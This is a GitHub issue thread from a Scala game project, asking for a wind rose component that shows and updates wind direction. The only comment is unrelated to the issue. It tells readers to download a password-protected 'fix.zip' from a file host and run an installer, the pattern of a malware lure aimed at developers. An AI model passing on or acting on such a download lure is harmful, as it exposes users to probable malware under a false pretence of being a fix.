### ISSUE TITLE
Implementation of the Wind Rose

### ISSUE THREAD

**Issue by rbattistini** [Fight-Fire-With-Scala/Scala-Fire-Tower#53]
# Description
Show the current wind direction and allow its modification through a GUI.

# Acceptance Criteria
- api to update the wind direction;
- show an fxml component that uses svg to display the cardinal directions and the current selected direction;
- api to enable or disable the wind rose according to the card being played.

# Linked Stories
- #32

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
